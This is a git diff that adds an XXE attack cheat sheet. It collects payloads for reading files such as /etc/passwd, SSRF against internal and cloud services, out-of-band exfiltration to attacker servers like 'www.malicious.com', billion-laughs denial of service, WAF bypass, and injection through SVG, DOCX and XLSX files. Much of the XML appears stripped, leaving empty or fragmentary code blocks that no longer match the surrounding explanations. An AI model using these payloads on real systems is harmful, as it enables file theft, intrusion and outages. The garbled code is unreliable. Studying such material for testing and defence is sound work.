diff --git a/XXE.md b/XXE.md
new file mode 100644
index 0000000..1239670
--- /dev/null
+++ b/XXE.md
@@ -0,0 +1,569 @@
+# XXE
+
+* **`Internal Entity`**: If an entity is declared within a DTD it is called as internal entity.
+Syntax: ``
+
+* **`External Entity`**: If an entity is declared outside a DTD it is called as external entity. Identified by SYSTEM.
+Syntax: ``
+
+### What is document type definition?
+The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be hybrid of the two.
+
+## Detect the vulnerability
+Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName`. Entities are defined inside the `DOCTYPE` element.
+```xml
+
+ ]>
+
+ John
+ &example;
+
+```
+It might help to set the **Content-Type:** `application/xml` in the request when sending XML payload to the server.
+
+
+
+## Exploiting XXE to retrieve files
+### Classic XXE
+We try to display the content of the file `/etc/passwd`
+```xml
+]>&test;
+```
+```xml
+
+
+
+]>
+&file;
+```
+```xml
+
+
+ ]>&xxe;
+```
+```xml
+
+
+ ]>&xxe;
+```
+> ⚠️ `SYSTEM` and `PUBLIC` are almost synonym
+```xml
+
+
+```
+### Classic XXE Base64 encoded
+```xml
+ %init; ]>
+```
+
+### PHP Wrapper inside XXE
+```xml
+ ]>
+
+
+ Jean &xxe; Dupont
+ 00 11 22 33 44
+ 42 rue du CTF
+ 75000
+ Paris
+
+
+```
+```xml
+
+
+
+]>
+&xxe;
+```
+### XInclude attacks
+When you can't modify the **DOCTYPE** element use the **XInclude** to target
+```xml
+
+
+```
+
+## Exploiting XXE to perform SSRF attacks
+XXE can be combined with the **SSRF** vulnerability to target another service on the network
+```xml
+
+
+
+]>
+&xxe;
+```
+An XXE could be used to abuse a SSRF inside a cloud
+```xml
+
+ ]>
+&xxe;1
+```
+**Blind SSRF**
+
+Using the previously commented technique you can make the server access a server you control to show it's vulnerable. But, if that's not working, maybe is because XML entities aren't allowed, in that case you could try using XML parameter entities:
+```xml
+
+ %xxe; ]>
+3;1
+```
+
+## Exploiting XXE to perform XSS attacks
+```xml
+script]]>alert(1)/script]]>
+```
+
+
+## Exploiting XXE to perform a deny of service
+⚠️ : These attacks might kill the service or the server, do not use them on the production.
+### Billion Laugh Attack
+```xml
+
+
+
+
+
+]>
+&a4;
+```
+### Yaml attack
+```xml
+a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
+b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
+c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
+d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
+e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
+f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
+g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
+h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
+i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
+```
+
+### Parameters Laugh attack
+A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping.
+```xml
+">
+ %pe_1;">
+ %pe_2;">
+ %pe_3;">
+ %pe_4;
+]>
+
+```
+
+## Exploiting Error Based XXE
+### Error Based - Using Local DTD File
+Short list of dtd files already stored on Linux systems; list them with `locate .dtd`
+```xml
+/usr/share/xml/fontconfig/fonts.dtd
+/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
+/usr/share/xml/svg/svg10.dtd
+/usr/share/xml/svg/svg11.dtd
+/usr/share/yelp/dtd/docbookx.dtd
+```
+The file `/usr/share/xml/fontconfig/fonts.dtd` has an injectable entity `%constant` at line 148: ``
+
+The final payload becomes:
+```xml
+
+
+
+ ">
+ %eval;
+ %error;
+
+ %local_dtd;
+]>
+Text
+```
+
+### Error Based - Using Remote DTD
+**Payload to trigger the XXE**
+```xml
+
+
+ %ext;
+]>
+
+```
+**Content of ext.dtd**
+```xml
+
+">
+%eval;
+%error;
+```
+**Let's break down the payload:**
+1. **``** This line defines an external entity named file that references the content of the file `/etc/passwd` (a Unix-like system file containing user account details).
+2. **`">`** This line defines an entity eval that holds another entity definition. This other entity (error) is meant to reference a nonexistent file and append the content of the file entity (the `/etc/passwd` content) to the end of the file path. The `%` is a URL-encoded '`%`' used to reference an entity inside an entity definition.
+3. **`%eval;`** This line uses the eval entity, which causes the entity error to be defined.
+4. **`%error;`** Finally, this line uses the error entity, which attempts to access a nonexistent file with a path that includes the content of `/etc/passwd`. Since the file doesn't exist, an error will be thrown. If the application reports back the error to the user and includes the file path in the error message, then the content of `/etc/passwd` would be disclosed as part of the error message, revealing sensitive information.
+
+## Exploiting blind XXE to exfiltrate data out-of-band
+Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
+
+
+### Basic Blind XXE
+The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
+```xml
+
+ %ext;
+]>
+
+```
+Send the content of `/etc/passwd` to ["www.malicious.com"](http://www.malicious.com/), you may receive only the first line.
+```xml
+
+
+
+
+]
+>
+&callhome;
+```
+
+### XXE OOB Attack (Yunusov, 2013)
+```xml
+
+
+&send;
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+
+">
+%all;
+```
+
+### XXE OOB with DTD and PHP filter
+```xml
+
+
+
+%sp;
+%param1;
+]>
+&exfil;
+
+File stored on http://127.0.0.1/dtd.xml
+
+">
+```
+
+### XXE OOB with Apache Karaf
+CVE-2018-11788 affecting versions:
+* Apache Karaf <= 4.2.1
+* Apache Karaf <= 4.1.6
+```xml
+
+ %dtd;]
+
+
+
+
+```
+Send the XML file to the deploy folder.
+[Ref. brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
+
+
+## XXE with local DTD
+In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
+```xml
+]>
+&test;
+```
+If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename.
+```xml
+
+
+ %local_dtd;
+]>
+
+```
+Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message.
+```xml
+
+
+
+ ">
+ %eval;
+ %error;
+ '>
+
+ %local_dtd;
+]>
+
+```
+## Content-Type
+### Content-Type: From x-www-urlencoded to XML
+If a POST request accepts the data in XML format, you could try to exploit a XXE in that request. For example, if a normal request contains the following:
+```html
+POST /action HTTP/1.0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 7
+
+foo=bar
+```
+Then you might be able submit the following request, with the same result:
+```html
+POST /action HTTP/1.0
+Content-Type: text/xml
+Content-Length: 52
+
+bar
+```
+### Content-Type: From JSON to XEE
+To change the request you could use a Burp Extension named “Content Type Converter“. [Here](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) you can find this example:
+```json
+Content-Type: application/json;charset=UTF-8
+
+{"root": {"root": {
+ "firstName": "Avinash",
+ "lastName": "",
+ "country": "United States",
+ "city": "ddd",
+ "postalCode": "ddd"
+}}}
+```
+```xml
+Content-Type: application/xml;charset=UTF-8
+
+
+]>
+
+
+ &xxe;
+
+ United States
+ ddd
+ ddd
+
+
+```
+Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).
+
+
+
+# WAF Bypasses
+### Bypass via character encoding
+XML parsers uses 4 methods to detect encoding:
+* HTTP Content Type: Content-Type: text/xml; charset=utf-8
+* Reading Byte Order Mark (BOM)
+* Reading first symbols of document
+ * UTF-8 (3C 3F 78 6D)
+ * UTF-16BE (00 3C 00 3F)
+ * UTF-16LE (3C 00 3F 00)
+* XML declaration:
+
+We can convert the payload to UTF-16 using iconv to bypass some WAF:
+```bash
+cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
+```
+
+## XXE in Java
+Unsecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE:
+
+
+
+# XXE in exotic files
+### XXE inside SVG
+```xml
+
+```
+
+**Classic**
+```xml
+
+ ]>
+
+```
+
+**OOB via SVG rasterization**
+xxe.svg
+```xml
+
+
+
+%sp;
+%param1;
+]>
+
+```
+xxe.xml
+```xml
+
+">
+```
+
+### XXE inside SOAP
+```xml
+
+
+ %dtd;]>]]>
+
+
+```
+### XXE inside DOCX file
+Format of an Open XML file (inject the payload in any `.xml` file):
+* /_rels/.rels
+* [Content_Types].xml
+* Default Main Document Part
+ * /word/document.xml
+ * /ppt/presentation.xml
+ * /xl/workbook.xml
+
+Then update the file `zip -u xxe.docx [Content_Types].xml`
+
+**Tool**: [oxml xxe](https://github.com/BuffaloWill/oxml_xxe)
+```txt
+DOCX/XLSX/PPTX
+ODT/ODG/ODP/ODS
+SVG
+XML
+PDF (experimental)
+JPG (experimental)
+GIF (experimental)
+```
+
+### XXE inside XLSX file
+Structure of the XLSX:
+```bash
+$ 7z l xxe.xlsx
+[...]
+ Date Time Attr Size Compressed Name
+------------------- ----- ------------ ------------ ------------------------
+2021-10-17 15:19:00 ..... 578 223 _rels/.rels
+2021-10-17 15:19:00 ..... 887 508 xl/workbook.xml
+2021-10-17 15:19:00 ..... 4451 643 xl/styles.xml
+2021-10-17 15:19:00 ..... 2042 899 xl/worksheets/sheet1.xml
+2021-10-17 15:19:00 ..... 549 210 xl/_rels/workbook.xml.rels
+2021-10-17 15:19:00 ..... 201 160 xl/sharedStrings.xml
+2021-10-17 15:19:00 ..... 731 352 docProps/core.xml
+2021-10-17 15:19:00 ..... 410 246 docProps/app.xml
+2021-10-17 15:19:00 ..... 1367 345 [Content_Types].xml
+------------------- ----- ------------ ------------ ------------------------
+2021-10-17 15:19:00 11216 3586 9 files
+```
+
+Extract Excel file: 7z x -oXXE xxe.xlsx
+
+Rebuild Excel file:
+```bash
+$ cd XXE
+$ 7z u ../xxe.xlsx *
+```
+Add your blind XXE payload inside `xl/workbook.xml`.
+```xml
+
+%asd;%c;]>
+&rrr;
+
+```
+Alternativly, add your payload in xl/sharedStrings.xml:
+```xml
+
+%asd;%c;]>
+&rrr;testA2testA3testA4testA5testB1testB2testB3testB4testB5
+```
+Using a remote DTD will save us the time to rebuild a document each time we want to retrieve a different file. Instead we build the document once and then change the DTD. And using FTP instead of HTTP allows to retrieve much larger files.
+
+`xxe.dtd`
+
+```xml
+
+">
+```
+Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/xxeserv):
+```bash
+$ xxeserv -o files.log -p 2121 -w -wd public -wp 8000
+```
+### XXE inside DTD file
+Most XXE payloads detailed above require control over both the `DTD` or `DOCTYPE` block as well as the `xml` file. In rare situations, you may only control the `DTD` file and won't be able to modify the `xml` file. For example, a MITM. When all you control is the `DTD` file, and you do not control the `xml` file, XXE may still be possible with this payload.
+```xml
+
+
+
+'>
+%param1;
+%external;
+```
+
+## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents
+From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
+### Disclose local file
+```xml
+
+
+
+ ">
+ %eval;
+ %error;
+
+ %local_dtd;
+ ]>cacat
+```
+Disclose HTTP Response:
+```xml
+
+
+
+ ">
+ %eval;
+ %error;
+
+ %local_dtd;
+ ]>cacat
+```
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+